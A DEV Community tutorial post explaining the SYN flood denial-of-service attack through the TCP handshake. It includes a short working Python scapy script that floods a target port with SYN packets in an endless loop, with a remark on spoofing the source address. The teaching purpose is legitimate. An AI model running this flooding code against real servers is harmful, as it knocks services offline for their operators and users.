DEV Community

Cover image for SYN Flood Attack
Grzegorz Piechnik
Grzegorz Piechnik

Posted on • Edited on

SYN Flood Attack

Despite the passage of time, some forms of attacks do not change, only their form is slightly modified. One of the simplest attacks that can be used in various ways is the SYN flood attack. In this regard, let's zoom in a bit on its image.

What is a SYN flood attack?

To illustrate this, let's recall how the TCP protocol works.

      TCP A                                                TCP B

  1.  CLOSED                                               LISTEN
  2.  SYN-SENT    --> <SEQ=100><CTL=SYN>               --> SYN-RECEIVED
  3.  ESTABLISHED <-- <SEQ=300><ACK=101><CTL=SYN,ACK>  <-- SYN-RECEIVED
  4.  ESTABLISHED --> <SEQ=101><ACK=301><CTL=ACK>       --> ESTABLISHED
  5.  ESTABLISHED --> <SEQ=101><ACK=301><CTL=ACK><DATA> --> ESTABLISHED
Enter fullscreen mode Exit fullscreen mode

What we need to know about this TCP communication is that the client (TCP A) sends a request to establish a connection, sending a SYN message to the server (TCP B). To this the server responds with a SYN-ACK message, and the client again sends a message — this time ACK. In this way, a connection is established. Here we also get to the heart of the matter.

In a SYN flood attack, the attacker sends SYN packets one by one (it also often happens to different network ports). In this way, the server responds to each connection attempt with a SYN-ACK packet, with the ultimate goal of overloading and blocking the server's services.

Construction of the script

To begin with, let's look at a simple script prepared in Python.

from scapy.all import *

target_ip = "127.0.0.1"
target_port = 80

ip = IP(dst = target_ip)
tcp = TCP(sport = RandShort(), dport = target_port, flags = "S")

raw = Raw(b"X"*1024)
p = ip / tcp / raw
send(p, loop = 1, verbose = 0)
Enter fullscreen mode Exit fullscreen mode

First, we initialize a variable holding the ip and port of the attacked machine. Then we create a packet whose destination address is the address of the attacked server (IP(dst = target_ip)). At this point it is worth mentioning that if we wanted to spoof the IP address of the opening connection, we can specify the optional parameter src to in the creation of an instance of the IP class. In the following lines (TCP(sport = RandShort(), dport = target_port, flags = "S")) we create a SYN packet with a random source port and a destination port as target_port. It remains to create data (variable raw), create layers (ip / tcp / raw) and send the constructed packet in a loop. At best, the server will stop responding.

Sources

https://pl.wikipedia.org/wiki/SYN_flood
https://www.cloudflare.com/learning/ddos/syn-flood-ddos-attack/

Image of Timescale

🚀 pgai Vectorizer: SQLAlchemy and LiteLLM Make Vector Search Simple

We built pgai Vectorizer to simplify embedding management for AI applications—without needing a separate database or complex infrastructure. Since launch, developers have created over 3,000 vectorizers on Timescale Cloud, with many more self-hosted.

Read full post →

Top comments (0)

Image of Docusign

🛠️ Bring your solution into Docusign. Reach over 1.6M customers.

Docusign is now extensible. Overcome challenges with disconnected products and inaccessible data by bringing your solutions into Docusign and publishing to 1.6M customers in the App Center.

Learn more